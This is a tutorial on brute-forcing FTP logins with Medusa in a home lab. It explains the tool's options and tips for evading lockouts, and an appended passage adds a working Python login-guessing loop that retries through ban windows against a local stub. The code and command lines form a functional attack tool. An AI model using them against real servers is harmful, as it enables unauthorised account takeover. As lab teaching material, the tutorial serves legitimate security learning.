After a hiatus, I feel like diving into
online password cracking tools, and Medusa seemed a nice fit for this
purpose. As most of you will know, Medusa is a cracking tool like
ncrack or hydra that runs brute-force login attacks against remote
services. It supports all sorts of protocols such as SSH, Telnet, HTTP,
HTTPS and many more. Before we start, there are certain things we should
know about how the FTP service works and what sort of limitations or
restrictions hosts can apply to it. What is the maximum number of failed
login attempts? Is the server configured to ban clients after a certain
number of failed attempts? If so, is the ban permanent or temporary?
These facts can seriously hamper the cracking process, and in the end
they decide whether you cannot pull it off at all or just need to add
some parameters (fewer parallel connections, a pause between retries)
to make it work.
For the sake of this tutorial, I
planned to use it for FTP cracking. I prepared wordlists on a Kali
Linux virtual machine and installed ProFTPD 1.3.5 on my laptop as the
server machine. The valid username is username and the password is
password123.
Medusa is fairly straightforward and
has a command-line interface. I should say there are mainly five
parameters you will always use. The first is the host address, which
-h stands for. It also lets you pass a file containing multiple hosts
(-H followed by the path to the list) when you need to work on more
than one host, which is a pretty rare case I guess. Next, we have the
username, whose parameter is -u for a single name or -U for a list.
Like hydra, Medusa uses lower case for a single value you define
yourself and upper case for a file. When you are sure there is a
username called admin, go ahead and put -u admin. The same applies to
the password (-p or -P). Let us say you have no clue what either could
be. In that case you should prepare wordlists for both usernames and
passwords, either a ready-to-use list you find somewhere or a specific
one you compile by guessing probable usernames. Taking shots in the
dark won't get you far unless you know at least one of the two, so I
recommend short lists that include words you think are likely valid,
such as admin, root, me or ftp; a long username list multiplied by a
long password list is exactly what a lockout policy punishes. Last but
not least, we need to specify the module, which defines the protocol to
attack: -M stands for module, and for this tutorial it is -M ftp (ssh,
telnet, http and so on are other modules; medusa -d lists the ones
installed). Below, we have a couple of optional parameters to tweak
your brute-force process.
An FTP server might have more than one
valid account, so when Medusa finds a correct username and password it
does not stop; it keeps going until the lists are exhausted, trying
every username and password pair in order. If you want it to stop once
it finds a valid pair, add the -f parameter (-F does the same across
all hosts when you are using -H). For brute-forcing login pages over
HTTPS, the -s parameter enables SSL. -v stands for verbosity, which can
be increased up to level six. It also offers you a convenient way to
resume your previous scan with the -Z parameter. The -e parameter adds
extra guesses for every username without you having to put them in the
wordlist: -e n tries an empty password, -e s tries the username itself
as the password, and -e ns tries both. These are the two guesses most
likely to pay off for free, so I usually add them. Maybe the FTP server
is carefully configured against brute-force attacks and you get blocked
while attempting. Then you can make fine adjustments: -r sets the sleep
duration in seconds between retry attempts, -R the maximum number of
retries before giving up on a host, and -t the number of login attempts
run in parallel (a low value such as -t 1 is gentler on a server with a
lockout threshold). For further information, check out the other
parameters yourself and test them against your target in a virtual
machine.
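To make the parameters above and the lockout problem from the introduction concrete, here is an added example that is not Medusa's code and not part of the original tutorial: a small Medusa-style FTP login loop in Python, run against a constructed in-process FTP stub so it works offline. The stub, its lockout rule (three failed logins in a row, then 421 to every new connection for half a second), the credentials username/password123, the wordlists and the helper names (FtpStub, try_login, crack, run_demo) are all assumptions made for the demo. The loop reproduces what -e ns, -f, -r and -R do, which on a real target would be roughly `medusa -h 192.168.1.10 -U users.txt -P passwords.txt -M ftp -e ns -f -r 1 -R 3`.

```python
# Added example, not Medusa's own code: a Medusa-style FTP login loop run
# against a constructed in-process FTP stub so it works offline. The stub,
# the credentials and the wordlists below are assumptions made for the demo.
import socket
import threading
import time
from ftplib import FTP, error_perm, error_temp

VALID = {"username": "password123"}  # assumed credentials from the tutorial
MAX_FAILURES = 3   # the stub locks out after this many failed logins in a row
BAN_SECONDS = 0.5  # ... by answering 421 to every new connection for this long


class FtpStub(threading.Thread):  # constructed target: USER, PASS, QUIT only
    def __init__(self):
        super().__init__(daemon=True)
        self.sock = socket.create_server(("127.0.0.1", 0))  # ephemeral port
        self.port = self.sock.getsockname()[1]
        self.failures, self.banned_until, self.rejected = 0, 0.0, 0

    def run(self):
        while True:
            conn, _ = self.sock.accept()
            threading.Thread(target=self.handle, args=(conn,), daemon=True).start()

    def handle(self, conn):
        f, user = conn.makefile("rwb"), None
        send = lambda line: (f.write((line + "\r\n").encode()), f.flush())
        if time.monotonic() < self.banned_until:  # lockout window still active
            self.rejected += 1
            send("421 Too many failed logins, try again later")
            conn.close()
            return
        send("220 stub FTP ready")
        for raw in f:
            cmd, _, arg = raw.decode().strip().partition(" ")
            if cmd.upper() == "USER":
                user = arg
                send("331 Password required")
            elif cmd.upper() == "PASS" and VALID.get(user) == arg:
                send("230 Login successful")
            elif cmd.upper() == "PASS":
                self.failures += 1
                if self.failures >= MAX_FAILURES:
                    self.failures = 0
                    self.banned_until = time.monotonic() + BAN_SECONDS
                send("530 Login incorrect")
            else:  # QUIT (or anything else) ends the session
                send("221 Goodbye")
                break
        conn.close()


def try_login(host, port, user, password):
    """True = valid, False = rejected (530), None = no answer (421 lockout,
    refused or dropped connection), which the caller should retry later."""
    ftp = FTP()
    try:
        ftp.connect(host, port, timeout=5)
        ftp.login(user, password)
        ftp.quit()
        return True
    except error_perm:
        return False
    except (error_temp, OSError, EOFError):
        return None
    finally:
        ftp.close()


def crack(host, port, users, passwords, extra="ns", stop_first=True,
          retry_wait=0.25, max_retries=3):
    """Mirrors the Medusa options: -e n/s puts an empty password and the username
    ahead of the wordlist, -f stops at the first valid pair, -r/-R = retry wait/limit."""
    found, answered = [], 0
    for user in users:
        extras = ([""] if "n" in extra else []) + ([user] if "s" in extra else [])
        for password in extras + list(passwords):
            result, retries = try_login(host, port, user, password), 0
            while result is None:  # locked out or dropped: wait, then retry
                retries += 1
                if retries > max_retries:
                    raise RuntimeError(f"giving up on {user!r}: target not answering")
                time.sleep(retry_wait)
                result = try_login(host, port, user, password)
            answered += 1
            if result:
                found.append((user, password))
                if stop_first:
                    return found, answered
    return found, answered


def run_demo():
    # Roughly: medusa -h 127.0.0.1 -n PORT -U users.txt -P passwords.txt -M ftp
    #          -e ns -f -r 1 -R 3, with constructed, deliberately short lists.
    server = FtpStub()
    server.start()
    found, answered = crack("127.0.0.1", server.port, ["admin", "ftp", "username"],
                            ["123456", "password", "password123"])
    return found, answered, server.rejected


if __name__ == "__main__":
    print(run_demo())  # ([('username', 'password123')], 15, <421 replies seen>)
```

Running it shows the two points the text makes: the valid pair is found on the 15th answered attempt and the loop stops there because of the -f equivalent, and the lockout bites four times along the way, each time answered by sleeping and retrying rather than by misreading the 421 as a wrong password. Without the retry logic (or with -R set too low) a Medusa run against such a server silently skips every candidate that happens to fall inside a ban window, which is the hidden failure mode behind the "does it ban, and for how long" questions at the start.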